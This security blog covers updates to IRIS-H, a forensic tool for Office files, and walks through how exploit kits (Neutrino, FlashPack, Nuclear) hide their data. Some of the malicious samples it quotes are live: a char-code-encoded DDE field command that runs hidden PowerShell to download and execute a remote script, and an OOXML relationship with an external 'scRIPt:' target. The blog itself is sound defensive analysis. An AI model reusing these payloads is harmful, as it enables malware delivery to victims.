Pages

Thursday, 16 November 2017

IRIS-H (alpha): Updated OOXML 'document' file parser

Quick Summary

Build Version: 0.0.1(alpha)
Change Type: feature update
Affected Components: API
Short Description: OOXML 'document' file parser has been updated to detect and extract "Drawing Object Non-Visual Properties".
Examplehttps://iris-h.malwageddon.com/report/380710e90e15242de982aede9a62c66e
Outstanding Tasks: None

Detailed Summary

"Drawing Object Non-Visual Properties(docPr) element specifies non-visual object properties for the parent DrawingML object. These properties are specified as child elements of 'docPr' element." - ECMA-376 Part 1 (section 20.4.2.5)

OOXML 'document' file parser has been updated to extract non-visual object properties associated with inline drawing objects(pictures). The extracted data will be displayed in the corresponding 'document' panel under 'Individual Components' section on the report page. The following properties will be considered:

  • descrSpecifies alternative text for the current DrawingML object, for use by assistive technologies or applications which do not display the current object.
  • hidden - Specifies whether this DrawingML object is displayed. When a DrawingML object is displayed within a document, that object can be hidden (i.e., present, but not visible).
  • name - Specifies the name of the object. Typically, this is used to store the original file name of a picture object.
  • title - Specifies the title (caption) of the current DrawingML object.

Some of the above properties might be omitted from the property set. IRIS-H will only extract and display properties present in the set. See below for an example:
'document' panel showing non-visual object properties extracted from inline drawing object

As seen in the screenshot above, these properties might contain digital artifacts that can be helpful in a digital forensics investigation.

Full report for the example above can be found here - https://iris-h.malwageddon.com/report/380710e90e15242de982aede9a62c66e




IRIS-H (alpha): Added OOXML 'Footer Part' parser

Quick Summary

Build Version: 0.0.1(alpha)
Change Type: new feature
Affected Components: API
Short Description: Parser for OOXML "Footer Part" has been added. The parser detects and extracts text content including special field characters.
Example: https://iris-h.malwageddon.com/report/380710e90e15242de982aede9a62c66e
Outstanding Tasks: None

Detailed Summary

"Footer Part contains the information about a footer displayed for one or more sections. Each Footer part is the target of an explicit relationship in the part-relationship item for the Main Document. Each footer has a corresponding 'ftr' element in a Footer part, which contains the text of the footer.ECMA-376 Part 1 (section 11.3.6)

A new parser for OOXML 'Footer Part' has been added to IRIS-H. The parser will detect and extract text content including special field characters. The extracted content can be found in a new panel under 'Individual Components' section on the report page. See an example below:


Example of a Footer Part panel showing extracted text content.

If the extracted content includes special field characters, they will be analysed for presence of blacklisted field character command and if any detected, the findings will be populated in 'Malicious Findings' panel on the report page. Below is the corresponding findings panel:


Corresponding findings panel showing detected field character type

Full report for the example above can be found here - https://iris-h.malwageddon.com/report/380710e90e15242de982aede9a62c66e



Thursday, 9 November 2017

IRIS-H (alpha): Added OOXML Relationships file parser

Quick Summary

Build Version: 0.0.1(alpha)
Change Type: new feature
Affected Components: API & UI (clear browser cache to see the changes)
Short Description: Parser for OOXML "Relationships" file has been added. The parser detects and extracts hyperlinks to external sources.
Outstanding Tasks: None

Detailed Summary

"Relationships are represented in XML in a Relationships part. Each part in the package that is the source of one or more relationships can have an associated Relationships part. This part holds the list of relationships for the source part." - ECMA-376 Part 2 (section 9.3.3)


Relationships file example
A new parser for OOXML Relationships file has been added to IRIS-H. The parser is configured to read every Relationship in the Relationships file and extract hyperlinks pointed at external sources. See below for an example of a Relationship that will be detected:
<Relationship Id="_id_1633" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" TargetMode="External" Target="scRIPt:https://filetea.me/n3wBS7q8XNvRjiEwg8ZL2bXhw/dl" />

The extracted hyperlinks will be displayed under "Suspicious Finding" panel. See below for an example:

"Suspicious Findings" example showing detected hyperlinks

Full report for the example above can be found here - https://iris-h.malwageddon.com/report/7b133ac4016aab06fff2c24e5d9e9e97

NOTE
IRIS-H UI changes might require your Internet browser cache clean up for iris-h.malwageddon.com website to take effect.



Wednesday, 8 November 2017

IRIS-H (alpha): Updated Field Characters Parser

Quick Summary

Build Version: 0.0.1(alpha)
Change Type: feature improvement
Affected Components: API
Short Description: Parser for Field Characters used in OLE and OOXML documents has been updated to improve detection. QUOTE, SET, REF field characters have been added to the reporting.
Outstanding Tasks: None

Detailed Summary

Field Character extraction and parsing code has been improved to allow for decoding QUOTE command arguments. The change was motivated by McAfee's blog post today referencing OOXML document used in an APT type of attack. Document's XML code snippet below show an example of what field characters are used and how they are present in the code.


QUOTE field character usage example
DDE field character and the way its arguments are assembled
Unlike previous instances of DDE and DDEAUTO field character usage in malicious documents, this document doesn't expose the command arguments that normally contain indicators of compromise. Instead, a combination of other field characters is used to store and assemble the command arguments.

SET command is used to store the value produced by QUOTE command and later passed to DDE command through REF field character. Below is an example of that:
SET c QUOTE 67 58 92 80 114 111 103 114 97 109 115 92 77 105 99 114 111 115 111 102 116 92 79 102 102 105 99 101 92 77 83 87 111 114 100 46 101 120 101 92 46 46 92 46 46 92 46 46 92 46 46 92 87 105 110 100 111 119 115 92 83 121 115 116 101 109 51 50 92 87 105 110 100 111 119 115 80 111 119 101 114 83 104 101 108 108 92 118 49 46 48 92 112 111 119 101 114 115 104 101 108 108 46 101 120 101 32 45 78 111 80 32 45 115 116 97 32 45 78 111 110 73 32 45 87 32 72 105 100 100 101 110 32 36 101 61 40 78 101 119 45 79 98 106 101 99 116 32 83 121 115 116 101 109 46 78 101 116 46 87 101 98 67 108 105 101 110 116 41 46 68 111 119 110 108 111 97 100 83 116 114 105 110 103 40 39 104 116 116 112 58 47 47 110 101 116 109 101 100 105 97 114 101 115 111 117 114 99 101 115 46 99 111 109 47 99 111 110 102 105 103 46 116 120 116 39 41 59 112 111 119 101 114 115 104 101 108 108 32 45 101 110 99 32 36 101 32 35
 'c' variable now holds the output (character string built from the array of character codes) from QUOTE command. Later 'c' is referenced in DDE command call as one of the arguments.
DDE REF c
When DDE command is called, the value of 'c' variable will be used  as its argument.

IRIS-H field character handlers have been updated to be able to extract the character codes array associated with QUOTE command and decode it. If extraction and decoding is successful the report page will contain the output similar to the one below.

Example of QUOTE command evaluation
This method of using field characters presents new challenges, especially around reconstructing the original text in the same sequence as it appears in the document when it's opened with its corresponding host application. IRIS-H will still attempt to extract all the text fields, but the original text appearance sequence cannot be guarantied.

Full report can be found here - https://iris-h.malwageddon.com/report/e0b8c953e3e6c3f133d1d9301e8eb15a

Tuesday, 7 November 2017

IRIS-H (alpha): Added support for Shell Link (.LNK) files

Quick Summary

Build Version: 0.0.1(alpha)
Change Type: new feature
Affected Components: API & UI
Short Description: Shell Link (.LNK) file format parser has been added to API component. Cosmetic changes to UI to align new data view with the existing format.
Outstanding Tasks: Implement support for missing Extra Data Blocks

Detailed Summary

New binary data parser has been added to IRIS-H service. It can handle processing and extracting digital artifacts from Shell Link (.LNK) files. The service now accepts LNK files through Submission page and can also automatically detect them embedded into submitted documents. In either case, the report page will display extracted binary data enriched with human readable description. The enrichment process references the official Microsoft specification for [MS-SHLLINK] Binary File Format.

The parser fully supports the following LNK file structures:

  • ShellLinkHeader
  • LinkTargetIDList
  • LinkInfo
  • StringData
ExtraData structure is partially supported at this time. Only the following Data Blocks will be processed:
  • EnvironmentVariableDataBlock
  • KnownFolderDataBlock
  • SpecialFolderDataBlock
  • TrackerDataBlock
  • PropertyStoreDataBlock
Once all binary data is extracted, it'll be subject to a rule-based evaluation. The conclusion will be drawn if the submitted or embedded LNK file can be harmful. IRIS-H will attempt to reconstruct the command line including arguments if any. Below is an example of rule-based evaluation results.

LNK file rule-based evaluation results
A few new sections have been added to "Informational Findings" panel. The sections display information relevant to the LNK file target; file path, working directory, relevant path, command-line arguments, etc. One particular section - "Link Target Tracking" will contain the evaluation results of the data stored in the following Data Blocks:
  • Droid Volume Identifier
  • Droid File Identifier
  • Birth Droid Volume Identifier
  • Birth Droid File Identifier
Based on this data, IRIS-H will try to identify if the link target file was moved between the volumes on the original computer or if it was moved to another machine. For more information see page 10 of this PDF. Below is an example of "Informational Findings" view.

LNK file Informational Findings example
"Detailed Components Breakdown" section of the report contains all the data IRIS-H could extract from an LNK file. I was personally surprised to find out how much those little files actually contain. For example, TrackerDataBlock holds the Link Target originator machine's NetBIOS name and MAC address. See below for an example.

Data derived from TrackerDataBlock

ShellLinkHeader section contains time stamps associated with Link Target, as well as, its file attributes, the type of the media it resides on(hard disk, USB, network, etc), media serial number and even command line window state. See below for an example.

Data derived from ShellLinkHeader
In addition, IRIS-H will attempt to resolve "Known Folder" GUID and "Special Folder" ID and display their corresponding descriptions. See an example below.

Enriched data derived from KnownFolderDataBlock and SpecialFolderDataBlock
Examples of full reports can be found on the links below:

https://iris-h.malwageddon.com/report/738e74f744e554d6ac89899357eca506 - embedded LNK file found in a Microsoft Office document.




Thursday, 21 September 2017

Announcement: IRIS-H (alpha) - Online Digital Forensic Tool for Microsoft Office Files

Introduction

IRIS-H is an online web service that performs static analysis of the files stored in a directory-based or strictly structured formats. The service disassembles submitted files into individual components based on the detected file format and performs static analysis of each of the components. The analysis process involves sequentially reading components' binary data and enriching it with human readable information. The enrichment process is based on the binary data description as per official file format specification. Further rule-based evaluation is performed on the extracted data in order to establish if the submitted file can be harmful to a computer system.

Disclaimer

Currently, the service is still being developed and running in alpha phase of the release life cycle. Application updates are pushed regularly and may require full data flush. There is absolutely no guarantee the uploaded data  and corresponding generated reports will be available during 'alpha' cycle. Any development/maintenance is done in my free time - this service is the result of a hobby rather than a paid job.

Acknowledgements

I'd like to say 'Thank You!' to the following individuals and organizations for their direct and/or indirect support. 👍
  • VirusTotal crew
  • StackOverflow ReactJS and NodeJS communities
  • Decalage
  • Individual security researchers who provided their invaluable feedback that materialized into improved and new features (I do not support fame leeching, so no names, but you know who you are)

IRIS-H Service

Pre-history

(skip to the next paragraph if you're not into fairy tales and stuff...)
Once upon a time I decided that challenging myself with learning JavaScript flavors is a great idea... well, still think it's a great idea... So, I set out on a quest to build something as I learn it. Looking far and wide, I thought a simple console based digital forensic tool could be a good start. Little did I know at the time, on how far it will actually take me... and so I ended up creating IRIS-H. The name doesn't really stand for anything with 'Next Generation' or 'Artificial Intelligence' or 'Blockchain' or even 'Cyber' buzz words in mind(sorry, no lasers either), despite having a logo. It's simply my tribute to all the hard working Irish people I had a pleasure to encounter in my last 20 years living in Ireland.

So, what's all about?...

I'd like to share an online tool I've been working on for the last a few months. IRIS-H is mainly being positioned as a digital forensics tool, though it has some rule-based logic it applies in order to determine the outcome of opening the analysed file on a computer system. The digital forensics aspect is revolving around putting descriptive meaning on the binary data derived from the analyzed file. Where possible, the tool attempts to extract digital artifacts to allow for further manual or automated analysis. In the case of malicious files analysis, a trained eye could leverage the tool to help him/her to perform a simple 'campaign' type attribution based on the data derived by the service and their best judgment.

It's important to note that IRIS-H is not a sandbox environment. The submitted file is never opened with its corresponding host application. This slightly limits IRIS-H functionality in terms of obtaining network based indicators of compromise(IoC). Still, the service attempts to evaluate the risk of opening the file on a computer system based on the IoCs derived from the binary data and presence of certain digital artifacts. Sometimes, when you search for a quick answer, this might be all you need.

IRIS-H can do some tricks, but the service is far from being mature. It's at the stage where it just started bringing some value to the work I do, so I hope it can do the same for the others.

Right, what can it do?...

The interaction with the service is done through its web interface. The interface allows for navigation through web pages that offer specific service features.
  • Home Page - offers ability to view latest file submissions. The view is utilizing a table to present the following data: submission time, submitted file MD5 hash, file name at submission time, detected file type and the result of rule-based risk evaluation.
Latest Submissions table view
  • Search Page - offers ability to search the service database using MD5, SHA1 or SHA256 hash strings. If a successful analysis already exists for the file with the provided hash the user is forwarded to a corresponding Report Page(more on this below).
Search Form view

  • Submit Page - offers ability to submit a file to be analyzed. File size and type validations are performed on this page. The page provides 'drag-and-drop' and 'no-submit-button' component to allow service users to select a file to submit. The upload file size limit is set to 10MB. If submitted file type is not supported an alert is spawned notifying the user. Only single file submissions are supported at this time. ZIPed files are not accepted yet.
Submit Page dropzone box
The following are some examples of what IRIS-H service can handle at this stage:
  • Files saved in Microsoft Office 97-2003 format (DOC, XLS, PPT) - only DOC files are fully supported at the moment
  • Files saved in Microsoft Office 2007+ format (DOCX, PPTX) - only DOCX files are fully supported at the moment. XLSX are not being accepted yet.
  • VBA project files extracted from the Microsoft Office documents that are saved in Open Office XML format
  • Objects embedded into other Microsoft Office documents including those in OOXML format
Technically, IRIS-H will accept and attempt to process any file in OLE-CF format. There are certain case per case limitations though, where the service might not have a parser for a 'not-so-common' OLE stream types.

Once a file is accepted and uploaded, IRIS-H begins dissecting the submitted file into separate components for further automated static analysis. When the analysis is completed, the user is forwarded to a corresponding Report Page.

Report Page is where everything comes together and to help service users navigate through the chunks of information, the page provides a navigation bar.
Left Navigation Bar Example
The information presented on the Report Page is a mixture of high level and 'deep dive' forensics data. The original idea was to be able to export it into a file format that can be stored or shared(like, PDF or similar), but due to some technical challenges I couldn't overcome I enabled report availability through its URL link.

Alright, but what's in it for me?...

Well, one would have to try it out and see, right? 😜 IRIS-H service is available at https://iris-h.malwageddon.com/ . Please make sure you get yourself familiar with Terms of Service. There is also About page that provides more details about the service.

... but just to give you some ideas, the screenshots below highlight some of the findings I came across of using file samples at my disposal.
VBA Digital Signature details
Detection for Microsoft Office field characters
IRIS-H detected embedded VBS script in the submitted file
'deep-dive' digital forensics view of the VBS file reported above.
Results of  VBA scripts analysis
Partial view of document embedded form analysis showing UA string hidden in form's tag field

Partial view of document meta data analysis showing URLs stored in the document
'deep-dive' forensics view of a linked object showing object's name and network path where it's stored
'deep-dive' forensics view of data from WordDocument stream showing Revision History, System Fonts and Users data
Example of Extracted Images preview
Example of findings view showing evidence of a linked ZIP file from the document
Example of extracted downloadable artifact (VBA macro script in this case)

Closing Note

If you have any feedback please do not hesitate to reach out. I believe, there is no better way to improve something, but to hear what people think about it.

Sunday, 22 March 2015

Data Obfuscation: Now you see me... Now you don't...

Introduction

This blog post shows how malware authors use Adobe Flash files to hide their creations' 'sensitive' data. I'll be using 2 recent Neutrino EK and 1 FlashPack malvertising samples to demonstrate it. In the case of Neutrino EK our goal will be extraction and decryption of its configuration file and in the malvertising case we'll be after the initial payload URL + exploit shellcode.

Executive Summary

It's fair to say that the exploit kit world is spinning around Adobe Flash files lately. ActionScript scripting language that drives SWF files execution is quite versatile and when combined with other SWF features, like, binary data containers or images embedding creates a strong application environment capable of executing relatively complex tasks. Some exploit kit authors already using SWF files to be all-in-one 'solution'. For example, Neutrino EK(aka Job314, aka Alter EK) uses Adobe Flash Player files to store exploits code, execution control logic(environment checks, exploit code selection, etc.), decryption keys for its various components and the configuration file. SWF file obfuscation applications further enhance data hiding capabilities and also drastically impede reverse engineering efforts making SWF files even more attractive to malware authors. The SWF files analysis below demonstrates how ActionScript combined with base64 encoding, RC4 encryption and image files can be used to hide the data.


What is magic?

The Neutrino EK sample analysed in this section was captured in Dec 2014. Its relatively simple landing page contains a request for an SWF file and what appears to be a base64 encoded GIF file.

Neutrino EK Dec 2014 sample - base64 encoded GIF stored on the landing page

Let's start with the GIF file and try to manually reconstruct it. After unescaping and base64 decoding it, we ended up with a chunk of binary data that's anything, but a GIF file. So, it has to mean something else. Note that the <img> tag has 'id' parameter - 'mqdscriyolhypdbstnmv'. There is no reference to it on the landing page, so quite possible it's being used by the SWF file. After some reverse engineering 'kung-fu' and ActionScript review we come across the function below:

Neutrino EK Dec 2014 sample - AS3 function to decode data stored in 'mqdscriyolhypdbstnmv' landing page element

The function appears to do the following:
  • compiles and calls a JavaScript to pull out the content of the landing page element with id - 'mqdscriyolhypdbstnmv'
  • splits the pulled content at 'base64,' expression creating 2 data chunks
  • unescapes and base64 decodes the 'second' chunk
  • runs the resulting data through RC4 decryption routine
So, we have already completed 'unescape' and 'base64 decode' operations, all we're missing now is the RC4 decryption pass for which we need to know the key. The routine above tells us to look for it in 'getRtConfigKey()' function. Let's take a look there.

Neutrino EK Dec 2014 sample - the configuration file RC4 decryption key

Alright, we got the key. Now let's find out what happens if we decrypt our data chunk with it.

Neutrino EK Dec 2014 sample - decrypted configuration file

There we go. The configuration file.

Just to make it a bit clearer why there are many initial payload URLs, let's take a look at the SWF file structure
Neutrino EK Dec 2014 sample - decrypted SWF structure

Take a look at the content of the 'exploit' folder in the screenshot above and note the 5 ActionScript filenames. Each of those scripts contains a routine that decrypts and launches an exploit code for some vulnerability. Now take a look at the tag names for each URL in the configuration file. Besides the first two, the rest of the names match the names of the ActionScripts. So, it appears that each exploit code has a unique URL associated with it to download the initial payload.

Focused deception.

The Neutrino EK sample analysed in this section was captured in Mar 2015. The landing page of this sample no longer has an <img> element with encoded data. In fact, it has nothing except the code requesting an SWF file.

Neutrino EK Mar 2015 sample - landing page

Into ActionScript code we descend again... until we reach a function that 'coincidentally' has the same name as in Dec 2014 sample - 'decodeRtConfig()'

Neutrino EK Mar 2015 sample - the configuration file decoding routine

As expected, there is no code interacting with any data outside of the SWF file, but instead there is a routine that performs some data manipulations with a binary data stored in one of the SWF binary data containers. Let's see what it does:
  • loads data from a binary data container
  • reads first 3 bytes and converts them into an Integer with radix 16
  • continues reading the data until bytes count reaches the Integer value
  • runs the read data through RC4 decryption routine
So, simply put, there is a chunk of data that we need to read just a part of and run it through RC4 decryption routine. Now we need to find out how much data we need to read and what the decryption key is. The key is not a problem at all since it can be found in the ActionScript code.

Neutrino EK Mar 2015 sample - the configuration file decryption key

For the Integer value of bytes to read we'll have to do some maths magic which will convert the first 3 bytes (0x36 0x32 0x65) into *drums roll*... 1582. Right, now we know how much data to read and the key to decrypt it.

Neutrino EK Mar 2015 sample - decrypted configuration file

And that's how we deal with this type of data hiding technique.

But deception meant to entertain.

At the beginning of February 2015 a FlashPack malvertising campaign was making rounds dropping CryptoWall malware.The scheme was rather interesting:
  • browser opens a webpage that requests some advertisement content from an ad TDS
  • TDS points the browser to an SWF file hosted on RackSpace CDN
  • browser starts showing the advertisement content that looks absolutely legit
  • 6 minutes later SWF generates a request to download CryptoWall malware
Let's take a closer look at this SWF file

FlashPack malvertising Feb 2015 sample - SWF with 'bonus scenes'

In a nutshell, there are 2 embedded SWF files each occupying a binary data container. One of them contains some legitimate advertisement content and the other one an exploit code for CVE-2014-0569. Let's examine the later one closer.

FlashPack malvertising Feb 2015 sample - initialization routine

After some environment checks, the execution comes to an interesting chain of events(last 2 lines of code in the screenshot above).
  • function 'images' is called with one argument passed to it
  • the returned value from 'images' is passed to 'decodeurl' function
  • the returned value from 'decodeurl' is passed to 'hex2bin' function
  • the returned value from 'hex2bin' is split at '&' character
Judging by the function names, we can assume that by passing some data stored in 'var_29' to 'images' function we will end up with 2 pieces of data on 'hex2bin' return - one presumably some URL and the other one unknown yet. So, let's find out what 'var_29' is.


'var_29' is assigned 'class_7' object. So, what is this object...


Ok, 'class_7' appears to be a 'BitmapAsset', but which one...


Alright, 'var_29' is actually an image file stored in SWF file. Now, let's find out what happens to it when it's passed to 'images' function.

FlashPack malvertising Feb 2015 sample - 'images' function

The function is performing the following:
  • extracts image's bitmap data
  • identifies the number of pixel rows
  • reads pixel values one by one from each identified row
  • converts pixels value to a character and adds to a string
Simple enough operation, but let's find out what happens with the resulting string in the 'decodeurl' function.

FlashPack malvertising Feb 2015 sample - 'decodeurl' function

This function is performing the following:
  • loops through the string received from 'images' function character by character
  • find position of each character in a predefined string - '_loc3_'
  • takes a character in the same position, but from a different string - '_loc2_'
  • adds this character to a new string - '_loc4_'
The result of 'decodeurl' function is expected to be a string of 'hex' values. So, let's see what happens during the final transformation of what used to be an image file before.

FlashPack malvertising Feb 2015 sample - 'hex2bin' function

'hex2bin' function is indeed expecting a string of 'hex' values that it will loop through reading two characters at the time, convert each pair to a character and add that character to a string.

Exactly my feeling after analyzing this sample

Ok, now let's do the same thing in Python and see what happens.

FlashPack malvertising Feb 2015 sample - part of decoded PNG file content

'The operation was a complete success!' (c) Dr. Nick Riviera(The Simpsons)

Our assumption was that at the end of the chained function calls we will have a string that can be broken in 2 at '&' character resulting in a URL and something else. Indeed we've got a URL and this something else turned out to be a part of the exploit shellcode.

That's all for now, folks!

Credits

@kafeine - invaluable intelligence sharing
@TimoHirvonen - tremendous help with reverse engineering SWF files

Tools Used

Sulo - https://github.com/F-Secure/Sulo
JPEXS Free Flash Decompiler - https://www.free-decompiler.com/flash/
Kahu Security Converter Tool - http://www.kahusecurity.com/tools/
JetBrains PyCharm - https://www.jetbrains.com/pycharm/
Notepad++ - http://notepad-plus-plus.org/


Tuesday, 23 September 2014

Deobfuscation tips: Nuclear EK landing page

DISCLAIMER: There isn't a single way to deal with obfuscated data/code. There are many automated and semi-automated tools available to help you with that. In this post though I'll be using none. The aim here is to walk through some code deobfuscation manually. This is not a comprehensive Nuclear EK landing page analysis. Only bits related to data/code obfuscation are covered.

NOTE: Exploit Kit sample used in this post was captured in September 2014. Taking the ever changing nature of EKs, the described below might not be applicable to the newer variants.

'Nuclear launch detected'

I'll be using Nuclear EK landing page sample here. Note a huge blob of numbers stored in 'G4Ah' variable and a string stored in 'qjv' variable. The string serves as a lookup key and the numbers blob is actually a sequence of 2 digit numbers that are used to find a character in 'lookup key' at the position = 2 digits value. The JavaScript on the landing page does quite a simple job - it splits the blob into 2 digits chunks, loops through each chunk value to find the corresponding character in the 'lookup key' and adds the found character to a string. This might sound a bit confusing, so let's translate it into a Python script to better understand it.

lookupKey = "LOOKUP_KEY_GOES_HERE"
encodedString = "NUMBERS_BLOB_GOES_HERE"
listOfValues = map(''.join, zip(*[iter(encodedString)]*2))
decodedString = ""

for index in range(len(listOfValues)):
    if int(listOfValues[index]) < 10:
        element = int(listOfValues[index])
    else:
        element = int(listOfValues[index]) - 2
    decodedElement = lookupKey[element]
    decodedString += decodedElement

print(decodedString)

You'll notice an 'if' condition in the 'lookup' loop - for any value greater than 10 subtract 2 from it and then perform the lookup. This is done to compensate for the escape '\' characters in the lookup key. I'm not entirely sure why '10', but assume the code logic that generates the key will not include characters that require escaping into the first 10 character positions of the key.

Before we can run the script we need to put the values into 'lookupKey' and 'encodedString'. Where the value for 'encodedString' is hard to miss in the landing page code, the value for 'lookupKey' might be challenging. From my personal experience with Nuclear EK landings, I found that the characters positions in the key are random, but its size is always 95 characters. The simplest, but not always reliable way to find the lookup key is to search for a variable assigned a long string value. If this method fails you'll have to follow the JavaScript code to find it.

Now, if we use the corresponding values from our landing page sample and run the script, we get the following output.

Another KISS approach to data obfuscation. Happy deobfuscation!